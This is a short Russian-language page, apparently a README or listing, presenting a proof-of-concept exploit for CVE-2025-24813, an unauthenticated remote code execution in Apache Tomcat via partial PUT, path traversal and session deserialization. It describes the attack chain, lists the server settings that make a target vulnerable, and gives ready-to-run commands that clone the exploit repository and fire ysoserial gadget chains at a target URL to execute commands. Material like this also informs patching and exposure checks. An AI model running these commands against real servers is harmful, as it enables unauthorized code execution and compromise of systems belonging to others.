
CVE-2025-24813 - Apache Tomcat RCE через десериализацию сеанса - PoC-эксплойт

Apache Tomcat — удалённое выполнение кода через десериализацию сессии
Неаутентифицированный частичный PUT + обход пути + десериализация через гаджеты
Экземпляры Apache Tomcat, в которых включён PUT для сервлета по умолчанию (readonly=false), позволяют записывать файлы через HTTP PUT-запросы. Создавая путь, который выходит за пределы каталога загрузки к месту хранения сессий FileStore, злоумышленник может подложить поддельный сериализованный Java-объект в виде файла .session. Следующий запрос, ссылающийся на эту сессию, запускает десериализацию и выполняет встроенную цепочку гаджетов.
conf/web.xml для сервлета по умолчанию установлено readonly=falseMETA-INF/context.xml настроены с org.apache.catalina.session.PersistentManagerFileStoreorg.apache.commons.collections.enableUnsafeSerialization=true (или commons-collections < 3.2.2)PUT и обход пути не фильтруются обратным прокси или WAFgit clone https://github.com/yuzuki-ayanami/CVE-2025-24813
cd CVE-2025-24813
pip install -r requirements.txt
python cve-2025-24813.py http://target:8080 --ysoserial ysoserial.jar -c 'id'
python cve-2025-24813.py http://target:8080 --ysoserial ysoserial.jar -c 'whoami' --gadget CommonsCollections7